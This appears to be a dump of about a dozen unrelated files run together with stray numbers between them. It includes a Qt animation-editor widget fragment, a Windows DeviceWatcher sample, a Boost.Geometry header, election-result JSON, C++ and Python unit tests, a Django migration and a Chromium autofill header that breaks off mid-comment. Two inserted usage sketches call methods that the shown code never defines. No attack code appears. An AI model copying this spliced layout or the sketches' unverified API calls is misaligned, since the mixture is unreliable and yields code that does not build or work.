action->data().toInt() : 0; return ret; } } return 0; } //----------------------------------------------------------------------------- void CMannNodesWidget::SetPopupMenuLock(QMenu* menu) { if (!m_bEditLock || !menu) { return; } for (QAction* action : menu->actions()) { const QString menuString = action->text(); if (menuString != tr("Expand") && menuString != tr("Collapse")) { action->setEnabled(false); } } } void CMannNodesWidget::resizeEvent(QResizeEvent* event) { QTreeView::resizeEvent(event); header()->resizeSection(0, width() - 2 * frameWidth() - 32); SyncKeyCtrl(); } QModelIndex CMannNodesWidget::SaveVerticalScrollPos() const { return indexAt(QPoint(0, 0)); } void CMannNodesWidget::RestoreVerticalScrollPos(const QModelIndex& index) { scrollTo(index, QAbstractItemView::PositionAtTop); } ////////////////////////////////////////////////////////////////////////// CSequencerNode* CMannNodesWidget::IsPointValidForAnimationInContextDrop(const QModelIndex& index, const QMimeData* pDataObject) const { if (!CMannequinDialog::GetCurrentInstance()->IsPaneSelected<CFragmentEditorPage*>()) { return nullptr; } QString clipFormat = EditorDragDropHelpers::GetAnimationNameClipboardFormat(); auto hData = pDataObject->data(clipFormat); if (hData.isNull()) { return nullptr; } string sAnimName = hData.data(); if (sAnimName.empty()) { return nullptr; } if (!m_model->sequence()) { return nullptr; } if (m_bEditLock) { return nullptr; } auto node = index.data(MannNodesTreeModel::NodeRole).value<CSequencerNode*>(); if (!node) { return nullptr; } if (!node->CanAddTrackForParameter(SEQUENCER_PARAM_ANIMLAYER)) { return nullptr; } return node; } ////////////////////////////////////////////////////////////////////////// // Assume IsPointValidForAnimationInContextDrop returned true bool CMannNodesWidget::CreatePointForAnimationInContextDrop(CSequencerNode* node, const QPoint& point, const QMimeData* pDataObject) { // List`s which tracks can be added to animation node. const unsigned int validParamCount = (unsigned int) node->GetParamCount(); QString clipFormat = EditorDragDropHelpers::GetAnimationNameClipboardFormat(); auto hData = pDataObject->data(clipFormat); if (hData.isNull()) { return false; } string sAnimName = hData.data(); unsigned int nAnimLyrIdx = 0; for (; nAnimLyrIdx < validParamCount; ++nAnimLyrIdx) { CSequencerNode::SParamInfo paramInfo; if (!node->GetParamInfo(nAnimLyrIdx, paramInfo)) { continue; } if (SEQUENCER_PARAM_ANIMLAYER == paramInfo.paramId) { break; } } if (nAnimLyrIdx == validParamCount) { return false; } _smart_ptr<CSequencerNode> pNode = node; AddTrack(nAnimLyrIdx, node); CSequencerTrack* pTrack = pNode->GetTrackByIndex(pNode->GetTrackCount() - 1); int keyID = pTrack->CreateKey(0.0f); CClipKey newKey; newKey.time = 0.0f; newKey.animRef.SetByString (sAnimName); pTrack->SetKey(keyID, &newKey); pTrack->SelectKey(keyID, true); return true; }
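A minimal sketch of how a caller might drive the paste path above. It assumes the listed CMannNodesWidget methods are publicly accessible and that AnimNodes behaves like a std::vector of CSequencerNode pointers; the helper function name is hypothetical and not part of the file above.

// Hypothetical caller, for illustration only: paste a copied layer onto the
// first selected node, guarding with CanPasteTrack() as the menu handler does.
void PasteLayerOnSelection(CMannNodesWidget* widget)
{
    AnimNodes nodes;                      // assumed: vector-like container of CSequencerNode*
    if (!widget->GetSelectedNodes(nodes))
    {
        return;                           // nothing selected
    }

    CSequencerNode* node = nodes.front();
    if (widget->CanPasteTrack(node))      // clipboard holds a compatible "TrackCopy"
    {
        widget->PasteTrack(node);         // creates the track and deserializes the keys
    }
}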
23,066
310
{ "name": "Stitcher (iOS)", "description": "A radio and podcast app.", "url": "https://itunes.apple.com/us/app/stitcher-for-podcasts/id288087905" }
60
496
<reponame>jamescodesthings/android-runtime
package org.nativescript.staticbindinggenerator.generating.writing;

public interface PackageNameWriter {

    void writePackageName(String packageName);
}
57
2,504
// Copyright (c) Microsoft. All rights reserved. #include "pch.h" #include "DeviceWatcherHelper.h" #include "MainPage.xaml.h" using namespace SDKTemplate; using namespace Platform; using namespace Windows::Foundation; using namespace Windows::UI::Core; using namespace Windows::Devices::Enumeration; void DeviceWatcherHelper::StartWatcher(DeviceWatcher^ deviceWatcherArg) { deviceWatcher = deviceWatcherArg; // Connect events to update our collection as the watcher report results. deviceWatcher->Added += ref new TypedEventHandler<DeviceWatcher^, DeviceInformation^>(this, &DeviceWatcherHelper::Watcher_DeviceAdded); deviceWatcher->Updated += ref new TypedEventHandler<DeviceWatcher^, DeviceInformationUpdate^>(this, &DeviceWatcherHelper::Watcher_DeviceUpdated); deviceWatcher->Removed += ref new TypedEventHandler<DeviceWatcher^, DeviceInformationUpdate^>(this, &DeviceWatcherHelper::Watcher_DeviceRemoved); deviceWatcher->EnumerationCompleted += ref new TypedEventHandler<DeviceWatcher^, Object^>(this, &DeviceWatcherHelper::Watcher_EnumerationCompleted); deviceWatcher->Stopped += ref new TypedEventHandler<DeviceWatcher^, Object^>(this, &DeviceWatcherHelper::Watcher_Stopped); deviceWatcher->Start(); } void DeviceWatcherHelper::StopWatcher() { // Since the device watcher runs in the background, it is possible that // a notification is "in flight" at the time we stop the watcher. // In other words, it is possible for the watcher to become stopped while a // handler is running, or for a handler to run after the watcher has stopped. if (IsWatcherStarted(deviceWatcher)) { // We do not null out the deviceWatcher yet because we want to receive // the Stopped event. deviceWatcher->Stop(); } } void DeviceWatcherHelper::Reset() { if (deviceWatcher != nullptr) { StopWatcher(); deviceWatcher = nullptr; } } bool DeviceWatcherHelper::IsWatcherStarted(DeviceWatcher^ watcher) { DeviceWatcherStatus status = watcher->Status; return (status == DeviceWatcherStatus::Started) || (status == DeviceWatcherStatus::EnumerationCompleted); } bool DeviceWatcherHelper::IsWatcherRunning() { if (deviceWatcher == nullptr) { return false; } DeviceWatcherStatus status = deviceWatcher->Status; return (status == DeviceWatcherStatus::Started) || (status == DeviceWatcherStatus::EnumerationCompleted) || (status == DeviceWatcherStatus::Stopping); } void DeviceWatcherHelper::Watcher_DeviceAdded(DeviceWatcher^ sender, DeviceInformation^ deviceInfo) { // Since we have the collection databound to a UI element, we need to update the collection on the UI thread. dispatcher->RunAsync(CoreDispatcherPriority::Low, ref new DispatchedHandler( [this, sender, deviceInfo]() { // Watcher may have stopped while we were waiting for our chance to run. if (IsWatcherStarted(sender)) { resultCollection->Append(ref new DeviceInformationDisplay(deviceInfo)); RaiseDeviceChanged(sender, deviceInfo->Id); } })); } void DeviceWatcherHelper::Watcher_DeviceUpdated(DeviceWatcher^ sender, DeviceInformationUpdate^ deviceInfoUpdate) { // Since we have the collection databound to a UI element, we need to update the collection on the UI thread. dispatcher->RunAsync(CoreDispatcherPriority::Low, ref new DispatchedHandler( [this, sender, deviceInfoUpdate]() { // Watcher may have stopped while we were waiting for our chance to run. if (IsWatcherStarted(sender)) { // Find the corresponding updated DeviceInformation in the collection and pass the update object // to the Update method of the existing DeviceInformation. This automatically updates the object // for us. 
auto foundDeviceInfo = std::find_if(begin(resultCollection), end(resultCollection), [&](DeviceInformationDisplay^ di) { return (di->Id == deviceInfoUpdate->Id); }); if (foundDeviceInfo != end(resultCollection)) { (*foundDeviceInfo)->Update(deviceInfoUpdate); RaiseDeviceChanged(sender, deviceInfoUpdate->Id); } } })); } void DeviceWatcherHelper::Watcher_DeviceRemoved(DeviceWatcher^ sender, DeviceInformationUpdate^ deviceInfoUpdate) { // Since we have the collection databound to a UI element, we need to update the collection on the UI thread. dispatcher->RunAsync(CoreDispatcherPriority::Low, ref new DispatchedHandler( [this, sender, deviceInfoUpdate]() { // Watcher may have stopped while we were waiting for our chance to run. if (IsWatcherStarted(sender)) { // Find the corresponding DeviceInformation in the collection and remove it auto foundDeviceInfo = std::find_if(begin(resultCollection), end(resultCollection), [&](DeviceInformationDisplay^ di) {return (di->Id == deviceInfoUpdate->Id); }); uint32 index = 0; if (foundDeviceInfo != end(resultCollection) && resultCollection->IndexOf(*foundDeviceInfo, &index)) { resultCollection->RemoveAt(index); } RaiseDeviceChanged(sender, deviceInfoUpdate->Id); } })); } void DeviceWatcherHelper::Watcher_EnumerationCompleted(DeviceWatcher^ sender, Object^ e) { dispatcher->RunAsync(CoreDispatcherPriority::Low, ref new DispatchedHandler( [this, sender]() { RaiseDeviceChanged(sender, nullptr); })); } void DeviceWatcherHelper::Watcher_Stopped(DeviceWatcher^ sender, Object^ e) { dispatcher->RunAsync(CoreDispatcherPriority::Low, ref new DispatchedHandler( [this, sender]() { RaiseDeviceChanged(sender, nullptr); })); } void DeviceWatcherHelper::RaiseDeviceChanged(DeviceWatcher^ sender, String^ id) { if (UpdateStatus) { // Display a default status message. String^ message = resultCollection->Size.ToString() + " devices found."; switch (sender->Status) { case DeviceWatcherStatus::Started: break; case DeviceWatcherStatus::EnumerationCompleted: message = message + " Enumeration completed. Watching for updates..."; break; case DeviceWatcherStatus::Stopped: message = message + " Watcher stopped."; break; case DeviceWatcherStatus::Aborted: message = message + " Watcher aborted."; break; } MainPage::Current->NotifyUser(message, NotifyType::StatusMessage); } DeviceChanged(sender, id); }
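A minimal sketch (not part of the sample above) of how a page might hand a watcher to this helper. The helper is assumed to be already constructed with its dispatcher and result collection, and the parameterless CreateWatcher overload is used only for brevity.

// Illustration only: start enumerating with an already-constructed helper.
void StartEnumeration(DeviceWatcherHelper^ watcherHelper)
{
    // A real page would normally pass a narrower AQS selector
    // (e.g. one returned by a GetDeviceSelector() call).
    DeviceWatcher^ watcher = DeviceInformation::CreateWatcher();

    // The helper wires up Added/Updated/Removed/EnumerationCompleted/Stopped
    // and then starts the watcher.
    watcherHelper->StartWatcher(watcher);
}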
2,578
354
// Boost.Geometry

// Copyright (c) 2017, Oracle and/or its affiliates.
// Contributed and/or modified by <NAME>, on behalf of Oracle

// Use, modification and distribution is subject to the Boost Software License,
// Version 1.0. (See accompanying file LICENSE_1_0.txt or copy at
// http://www.boost.org/LICENSE_1_0.txt)

#ifndef BOOST_GEOMETRY_SRS_IAU2000_HPP
#define BOOST_GEOMETRY_SRS_IAU2000_HPP

#include <boost/geometry/srs/projection.hpp>
#include <boost/geometry/srs/projections/iau2000.hpp>
#include <boost/geometry/srs/projections/iau2000_params.hpp>
#include <boost/geometry/srs/projections/iau2000_traits.hpp>

namespace boost { namespace geometry
{

namespace projections
{

template <typename CT>
struct dynamic_parameters<srs::iau2000, CT>
{
    static inline projections::parameters<CT> apply(srs::iau2000 const& params)
    {
        return projections::detail::pj_init_plus<CT>(
            srs::dynamic(),
            projections::detail::iau2000_to_string(params.code),
            false);
    }
};

template <int Code, typename CT>
class proj_wrapper<srs::static_iau2000<Code>, CT>
    : public static_proj_wrapper_base
        <
            typename projections::detail::iau2000_traits<Code>::static_parameters_type,
            CT
        >
{
    typedef projections::detail::iau2000_traits<Code> iau2000_traits;
    typedef typename iau2000_traits::static_parameters_type static_parameters_type;

    typedef static_proj_wrapper_base<static_parameters_type, CT> base_t;

public:
    proj_wrapper()
        : base_t(iau2000_traits::s_par(), iau2000_traits::par())
    {}
};

} // namespace projections

namespace srs
{

template <int Code, typename CT>
class projection<srs::static_iau2000<Code>, CT>
    : public projections::projection<srs::static_iau2000<Code>, CT>
{
    typedef projections::projection<srs::static_iau2000<Code>, CT> base_t;

public:
    projection()
    {}
};

} // namespace srs

}} // namespace boost::geometry

#endif // BOOST_GEOMETRY_SRS_IAU2000_HPP
815
348
<gh_stars>100-1000 {"nom":"Saint-Géréon","circ":"6ème circonscription","dpt":"Loire-Atlantique","inscrits":2450,"abs":979,"votants":1471,"blancs":18,"nuls":9,"exp":1444,"res":[{"nuance":"REM","nom":"<NAME>","voix":714},{"nuance":"LR","nom":"<NAME>","voix":249},{"nuance":"FI","nom":"Mme <NAME>","voix":211},{"nuance":"FN","nom":"Mme <NAME>","voix":104},{"nuance":"SOC","nom":"<NAME>","voix":71},{"nuance":"DVD","nom":"Mme <NAME>","voix":26},{"nuance":"DVD","nom":"<NAME>","voix":19},{"nuance":"REG","nom":"Mme <NAME>","voix":15},{"nuance":"DVG","nom":"M. <NAME>","voix":14},{"nuance":"EXG","nom":"Mme <NAME>","voix":9},{"nuance":"REG","nom":"M. <NAME>","voix":8},{"nuance":"DIV","nom":"Mme <NAME>","voix":4}]}
287
495
/****************************************************************************** Copyright (c) 2017, <NAME>. All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: * Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. * Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. * Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. ******************************************************************************/ #include <gtest/gtest.h> #include <ifopt/problem.h> #include <ifopt/test_vars_constr_cost.h> using namespace ifopt; TEST(Problem, GetNumberOfOptimizationVariables) { Problem nlp; nlp.AddVariableSet(std::make_shared<ExVariables>("var_set0")); nlp.AddVariableSet(std::make_shared<ExVariables>("var_set1")); EXPECT_EQ(2+2, nlp.GetNumberOfOptimizationVariables()); } TEST(Problem, GetBoundsOnOptimizationVariables) { Problem nlp; nlp.AddVariableSet(std::make_shared<ExVariables>("var_set0")); nlp.AddVariableSet(std::make_shared<ExVariables>("var_set1")); auto bounds = nlp.GetBoundsOnOptimizationVariables(); EXPECT_EQ(2+2, bounds.size()); // var_set0 EXPECT_DOUBLE_EQ(-1.0, bounds.at(0).lower_); EXPECT_DOUBLE_EQ(+1.0, bounds.at(0).upper_); EXPECT_DOUBLE_EQ(-inf, bounds.at(1).lower_); EXPECT_DOUBLE_EQ(+inf, bounds.at(1).upper_); // var_set1 EXPECT_DOUBLE_EQ(-1.0, bounds.at(2).lower_); EXPECT_DOUBLE_EQ(+1.0, bounds.at(2).upper_); EXPECT_DOUBLE_EQ(-inf, bounds.at(3).lower_); EXPECT_DOUBLE_EQ(+inf, bounds.at(3).upper_); } TEST(Problem, GetVariableValues) { auto var_set0 = std::make_shared<ExVariables>("var_set0"); var_set0->SetVariables(Eigen::Vector2d(0.1, 0.2)); auto var_set1 = std::make_shared<ExVariables>("var_set1"); var_set1->SetVariables(Eigen::Vector2d(0.3, 0.4)); Problem nlp; nlp.AddVariableSet(var_set0); nlp.AddVariableSet(var_set1); Eigen::VectorXd x = nlp.GetVariableValues(); EXPECT_EQ(0.1, x(0)); EXPECT_EQ(0.2, x(1)); EXPECT_EQ(0.3, x(2)); EXPECT_EQ(0.4, x(3)); } TEST(Problem, GetNumberOfConstraints) { Problem nlp; nlp.AddConstraintSet(std::make_shared<ExConstraint>("constraint1")); // add same constraints again for testing. // notice how the Jacobian calculation inside ExConstraint-class remains the //same - the full Jacobian is stitched together accordingly. 
nlp.AddConstraintSet(std::make_shared<ExConstraint>("constraint2")); EXPECT_EQ(1+1, nlp.GetNumberOfConstraints()); } TEST(Problem, GetBoundsOnConstraints) { Problem nlp; nlp.AddConstraintSet(std::make_shared<ExConstraint>("constraint1")); nlp.AddConstraintSet(std::make_shared<ExConstraint>("constraint2")); auto bounds = nlp.GetBoundsOnConstraints(); // since it's an equality contraint, upper and lower bound are equal EXPECT_DOUBLE_EQ(1.0, bounds.at(0).lower_); EXPECT_DOUBLE_EQ(1.0, bounds.at(0).upper_); EXPECT_DOUBLE_EQ(1.0, bounds.at(1).lower_); EXPECT_DOUBLE_EQ(1.0, bounds.at(1).upper_); } TEST(Problem, EvaluateConstraints) { Problem nlp; nlp.AddVariableSet(std::make_shared<ExVariables>()); nlp.AddConstraintSet(std::make_shared<ExConstraint>("constraint1")); nlp.AddConstraintSet(std::make_shared<ExConstraint>("constraint2")); double x[2] = { 2.0, 3.0 }; Eigen::VectorXd g = nlp.EvaluateConstraints(x); EXPECT_DOUBLE_EQ(2*2.0+3.0, g(0)); // constant -1 moved to bounds EXPECT_DOUBLE_EQ(2*2.0+3.0, g(1)); // constant -1 moved to bounds } TEST(Problem, GetJacobianOfConstraints) { Problem nlp; nlp.AddVariableSet(std::make_shared<ExVariables>()); nlp.AddConstraintSet(std::make_shared<ExConstraint>("constraint1")); nlp.AddConstraintSet(std::make_shared<ExConstraint>("constraint2")); double x[2] = { 2.0, 3.0 }; nlp.SetVariables(x); auto jac = nlp.GetJacobianOfConstraints(); EXPECT_EQ(nlp.GetNumberOfConstraints(), jac.rows()); EXPECT_EQ(nlp.GetNumberOfOptimizationVariables(), jac.cols()); EXPECT_DOUBLE_EQ(2*x[0], jac.coeffRef(0,0)); // constraint 1 w.r.t x0 EXPECT_DOUBLE_EQ(1.0, jac.coeffRef(0,1)); // constraint 1 w.r.t x1 EXPECT_DOUBLE_EQ(2*x[0], jac.coeffRef(1,0)); // constraint 2 w.r.t x0 EXPECT_DOUBLE_EQ(1.0, jac.coeffRef(1,1)); // constraint 2 w.r.t x1 } TEST(Problem, EvaluateCostFunction) { Problem nlp; nlp.AddVariableSet(std::make_shared<ExVariables>()); nlp.AddCostSet(std::make_shared<ExCost>("cost_term1")); nlp.AddCostSet(std::make_shared<ExCost>("cost_term2")); EXPECT_TRUE(nlp.HasCostTerms()); double x[2] = { 2.0, 3.0 }; EXPECT_DOUBLE_EQ(2*(-std::pow(x[1]-2.0,2)), nlp.EvaluateCostFunction(x)); // constant -1 moved to bounds } TEST(Problem, HasCostTerms) { Problem nlp; EXPECT_FALSE(nlp.HasCostTerms()); nlp.AddVariableSet(std::make_shared<ExVariables>()); EXPECT_FALSE(nlp.HasCostTerms()); nlp.AddConstraintSet(std::make_shared<ExConstraint>()); EXPECT_FALSE(nlp.HasCostTerms()); nlp.AddCostSet(std::make_shared<ExCost>()); EXPECT_TRUE(nlp.HasCostTerms()); } TEST(Problem, EvaluateCostFunctionGradient) { Problem nlp; nlp.AddVariableSet(std::make_shared<ExVariables>()); nlp.AddCostSet(std::make_shared<ExCost>("cost_term1")); nlp.AddCostSet(std::make_shared<ExCost>("cost_term2")); double x[2] = { 2.0, 3.0 }; Eigen::VectorXd grad = nlp.EvaluateCostFunctionGradient(x); EXPECT_EQ(nlp.GetNumberOfOptimizationVariables(), grad.rows()); EXPECT_DOUBLE_EQ(0.0, grad(0)); // cost1+cost2 w.r.t x0 EXPECT_DOUBLE_EQ(2*(-2*(x[1]-2)), grad(1)); // cost1+cost2 w.r.t x1 }
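A minimal sketch of solving the same example problem outside the tests. It assumes the optional ifopt_ipopt package (which provides ifopt::IpoptSolver) is installed; the "mumps" linear-solver option value is only illustrative and depends on the local IPOPT build.

#include <memory>

#include <ifopt/problem.h>
#include <ifopt/ipopt_solver.h>          // assumed: provided by the ifopt_ipopt package
#include <ifopt/test_vars_constr_cost.h>

int main()
{
    // Assemble the same toy problem the tests above build piece by piece.
    ifopt::Problem nlp;
    nlp.AddVariableSet(std::make_shared<ifopt::ExVariables>());
    nlp.AddConstraintSet(std::make_shared<ifopt::ExConstraint>());
    nlp.AddCostSet(std::make_shared<ifopt::ExCost>());

    // Hand the problem to IPOPT; the option value is illustrative only.
    ifopt::IpoptSolver solver;
    solver.SetOption("linear_solver", "mumps");
    solver.Solve(nlp);

    // Retrieve the optimized variable values.
    Eigen::VectorXd x = nlp.GetOptVariables()->GetValues();
    return 0;
}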
2,603
32,544
package com.baeldung.resourcebundle;

import java.util.Arrays;
import java.util.List;
import java.util.Locale;
import java.util.ResourceBundle;

public class ExampleControl extends ResourceBundle.Control {

    @Override
    public List<Locale> getCandidateLocales(String s, Locale locale) {
        return Arrays.asList(new Locale("pl", "PL"));
    }

}
126
348
<filename>docs/data/leg-t2/065/06501260.json<gh_stars>100-1000 {"nom":"Lapeyre","circ":"1ère circonscription","dpt":"Hautes-Pyrénées","inscrits":76,"abs":27,"votants":49,"blancs":2,"nuls":0,"exp":47,"res":[{"nuance":"REM","nom":"<NAME>","voix":31},{"nuance":"FI","nom":"Mme <NAME>","voix":16}]}
125
337
""" tests for recurrence class """ import numpy as np import theano import agentnet from agentnet.memory import RNNCell,GRUCell, LSTMCell import lasagne from lasagne.layers import * def test_recurrence(): """minimalstic test""" sequence = InputLayer((None, None, 3), name='input sequence') initial = InputLayer((None, 10), name='gru zero tick') # step inp = InputLayer((None, 3)) prev_gru = InputLayer((None, 10)) gru = GRUCell(prev_gru, inp, name='rnn') rec = agentnet.Recurrence(input_sequences={inp: sequence}, state_variables={gru: prev_gru}, state_init={gru: initial}, # defaults to zeros unroll_scan=False) weights = get_all_params(rec) gru_states = rec[gru] run = theano.function([sequence.input_var, initial.input_var], get_output(gru_states), ) assert tuple(run(np.random.randn(5, 25, 3), np.random.randn(5, 10)).shape) == (5, 25, 10) def test_recurrence_larger(): """larger recurrence""" sequence = InputLayer((None, None, 3), name='input sequence') initial_cell = InputLayer((None, 20), name='lstm cell zero tick') # step inp = InputLayer((None, 3)) prev_rnn = InputLayer((None, 10)) rnn = RNNCell(prev_rnn, inp, name='rnn') prev_lstm_cell = InputLayer((None,20)) #lstm cell prev_lstm_hid = InputLayer((None, 20)) #lstm output lstm_cell,lstm_hid = LSTMCell(prev_lstm_cell,prev_lstm_hid,input_or_inputs=rnn) lstm_hid = DropoutLayer(lstm_hid,p=0.5) #dropout hid, but not cell. Just to check it works from collections import OrderedDict #one can use regular dict but that causes a warning rec = agentnet.Recurrence(input_sequences={inp: sequence}, state_variables=OrderedDict({rnn: prev_rnn, lstm_hid:prev_lstm_hid, lstm_cell:prev_lstm_cell }), state_init={lstm_cell: initial_cell}, # defaults to zeros unroll_scan=False) weights = get_all_params(rec) rnn_states = rec[rnn] lstm_cell_states = rec[lstm_cell] lstm_hid_states = rec[lstm_hid] run = theano.function([sequence.input_var, initial_cell.input_var], get_output([rnn_states,lstm_cell_states,lstm_hid_states]), updates = rec.get_automatic_updates() #if any randomness is used AND unroll_scan, # one has to pass automatic updates ) out = run(np.random.randn(5, 25, 3), np.random.randn(5, 20)) assert tuple(out[0].shape) == (5, 25, 10) #rnn assert tuple(out[1].shape) == (5, 25, 20) #lstm cell assert tuple(out[2].shape) == (5, 25, 20) #lstm hid (aka output) def test_recurrence_substituted(): """test whether it is possible to use intermediate layers as recurrence inputs""" sequence = InputLayer((None, None, 3), name='input sequence') sequence_intermediate = InputLayer((None, None, 5), name='intermediate values sequence') initial = InputLayer((None, 10), name='gru zero tick') # step inp = InputLayer((None, 3),name='input') intermediate = DenseLayer(inp,5,name='intermediate') prev_gru = InputLayer((None, 10),name='prev rnn') gru = GRUCell(prev_gru, intermediate, name='rnn') #regular recurrence, provide inputs, intermediate is computed regularly rec = agentnet.Recurrence(input_sequences={inp: sequence}, state_variables={gru: prev_gru}, state_init={gru: initial}, # defaults to zeros unroll_scan=False) weights = get_all_params(rec) assert intermediate.b in weights gru_states = rec[gru] run = theano.function([sequence.input_var, initial.input_var], get_output(gru_states), ) assert tuple(run(np.random.randn(5, 25, 3), np.random.randn(5, 10)).shape) == (5, 25, 10) #recurrence with substituted intermediate values rec2= agentnet.Recurrence(input_sequences={intermediate: sequence_intermediate}, state_variables={gru: prev_gru}, state_init={gru: initial}, # defaults to zeros 
unroll_scan=False) weights2 = get_all_params(rec2) assert intermediate.b not in weights2 gru_states2 = rec2[gru] run = theano.function([sequence_intermediate.input_var, initial.input_var], get_output(gru_states2), ) assert tuple(run(np.random.randn(5, 25, 5), np.random.randn(5, 10)).shape) == (5, 25, 10) def test_recurrence_mask(): """test mask_input""" np.random.seed(1337) sequence = InputLayer((None, None, 2), name='input sequence') mask = InputLayer((None, None), name="rnn mask [batch,tick]") # step inp = InputLayer((None, 2)) prev_rnn = InputLayer((None, 3)) rnn = RNNCell(prev_rnn, inp, name='rnn', nonlinearity=lasagne.nonlinearities.linear, b=lasagne.init.Constant(100.0)) # init with positive constant to make sure hiddens change out = DenseLayer(rnn,num_units=10,nonlinearity=lasagne.nonlinearities.softmax) rec = agentnet.Recurrence(input_sequences={inp: sequence}, state_variables={rnn: prev_rnn}, tracked_outputs=[out], unroll_scan=False, mask_input=mask) rnn_states = rec[rnn] outs = rec[out] run = theano.function([sequence.input_var, mask.input_var], get_output([rnn_states,outs])) seq = np.random.randn(4, 5, 2) mask = np.zeros([4, 5]) mask[:2, :3] = 1 mask[2:, 2:] = 1 h_seq, out_seq = run(seq, mask) assert tuple(h_seq.shape) == (4, 5, 3) assert tuple(out_seq.shape) == (4,5,10) diff_out = np.diff(h_seq, axis=1) assert np.all(np.diff(h_seq, axis=1)[:2, 2:] == 0) assert np.all(np.diff(h_seq, axis=1)[:2, :2] != 0) assert np.all(np.diff(h_seq, axis=1)[2:, 1:] != 0) assert np.all(np.diff(h_seq, axis=1)[2:, :1] == 0)
2,900
544
#include "countryview.h" CountryView::CountryView(QObject *parent) : QObject(parent) { }
36
1,248
<filename>src/pretix/base/migrations/0122_orderposition_web_secret.py<gh_stars>1000+
# Generated by Django 2.2.1 on 2019-05-15 13:23

from django.db import migrations, models

import pretix.base.models.orders


class Migration(migrations.Migration):

    dependencies = [
        ('pretixbase', '0121_order_email_known_to_work'),
    ]

    operations = [
        migrations.AddField(
            model_name='orderposition',
            name='web_secret',
            field=models.CharField(db_index=True, default=pretix.base.models.orders.generate_secret, max_length=32),
        ),
    ]
246
2,151
// Copyright 2013 The Chromium Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. #ifndef COMPONENTS_AUTOFILL_CORE_BROWSER_AUTOFILL_FIELD_H_ #define COMPONENTS_AUTOFILL_CORE_BROWSER_AUTOFILL_FIELD_H_ #include <stddef.h> #include <string> #include "base/macros.h" #include "base/strings/string16.h" #include "components/autofill/core/browser/autofill_type.h" #include "components/autofill/core/browser/field_types.h" #include "components/autofill/core/browser/proto/server.pb.h" #include "components/autofill/core/common/form_field_data.h" #include "components/autofill/core/common/signatures_util.h" namespace autofill { class AutofillField : public FormFieldData { public: enum PhonePart { IGNORED = 0, PHONE_PREFIX = 1, PHONE_SUFFIX = 2, }; AutofillField(); AutofillField(const FormFieldData& field, const base::string16& unique_name); virtual ~AutofillField(); const base::string16& unique_name() const { return unique_name_; } ServerFieldType heuristic_type() const { return heuristic_type_; } ServerFieldType server_type() const { return server_type_; } const std::vector<AutofillQueryResponseContents::Field::FieldPrediction>& server_predictions() const { return server_predictions_; } HtmlFieldType html_type() const { return html_type_; } HtmlFieldMode html_mode() const { return html_mode_; } const ServerFieldTypeSet& possible_types() const { return possible_types_; } PhonePart phone_part() const { return phone_part_; } bool previously_autofilled() const { return previously_autofilled_; } const base::string16& parseable_name() const { return parseable_name_; } bool only_fill_when_focused() const { return only_fill_when_focused_; } // Setters for the detected types. void set_heuristic_type(ServerFieldType type); void set_server_type(ServerFieldType type); void set_server_predictions( const std::vector<AutofillQueryResponseContents::Field::FieldPrediction> predictions) { server_predictions_ = std::move(predictions); } void set_possible_types(const ServerFieldTypeSet& possible_types) { possible_types_ = possible_types; } void SetHtmlType(HtmlFieldType type, HtmlFieldMode mode); void set_previously_autofilled(bool previously_autofilled) { previously_autofilled_ = previously_autofilled; } void set_parseable_name(const base::string16& parseable_name) { parseable_name_ = parseable_name; } void set_only_fill_when_focused(bool fill_when_focused) { only_fill_when_focused_ = fill_when_focused; } // Set the type of the field. This sets the value returned by |Type|. // This function can be used to override the value that would be returned by // |ComputedType|. // As the |type| is expected to depend on |ComputedType|, the value will be // reset to |ComputedType| if some internal value change (e.g. on call to // (|set_heuristic_type| or |set_server_type|). // |SetTypeTo| cannot be called with // type.GetStoreableType() == NO_SERVER_DATA. void SetTypeTo(const AutofillType& type); // This function returns |ComputedType| unless the value has been overriden // by |SetTypeTo|. // (i.e. overall_type_ != NO_SERVER_DATA ? overall_type_ : ComputedType()) AutofillType Type() const; // This function automatically chooses between server and heuristic autofill // type, depending on the data available for this field alone. // This type does not take into account the rationalization involving the // surrounding fields. AutofillType ComputedType() const; // Returns true if the value of this field is empty. 
bool IsEmpty() const; // The unique signature of this field, composed of the field name and the html // input type in a 32-bit hash. FieldSignature GetFieldSignature() const; // Returns the field signature as string. std::string FieldSignatureAsStr() const; // Returns true if the field type has been determined (without the text in the // field). bool IsFieldFillable() const; void set_default_value(const std::string& value) { default_value_ = value; } const std::string& default_value() const { return default_value_; } void set_credit_card_number_offset(size_t position) { credit_card_number_offset_ = position; } size_t credit_card_number_offset() const { return credit_card_number_offset_; } void set_generation_type( AutofillUploadContents::Field::PasswordGenerationType type) { generation_type_ = type; } AutofillUploadContents::Field::PasswordGenerationType generation_type() const { return generation_type_; } void set_generated_password_changed(bool generated_password_changed) { generated_password_changed_ = generated_password_changed; } bool generated_password_changed() const { return generated_password_changed_; } void set_form_classifier_outcome( AutofillUploadContents::Field::FormClassifierOutcome outcome) { form_classifier_outcome_ = outcome; } AutofillUploadContents::Field::FormClassifierOutcome form_classifier_outcome() const { return form_classifier_outcome_; } void set_vote_type(AutofillUploadContents::Field::VoteType type) { vote_type_ = type; } AutofillUploadContents::Field::VoteType vote_type() const { return vote_type_; } private: // Whether the heuristics or server predict a credit card field. bool IsCreditCardPrediction() const; // The unique name of this field, generated by Autofill. base::string16 unique_name_; // The type of the 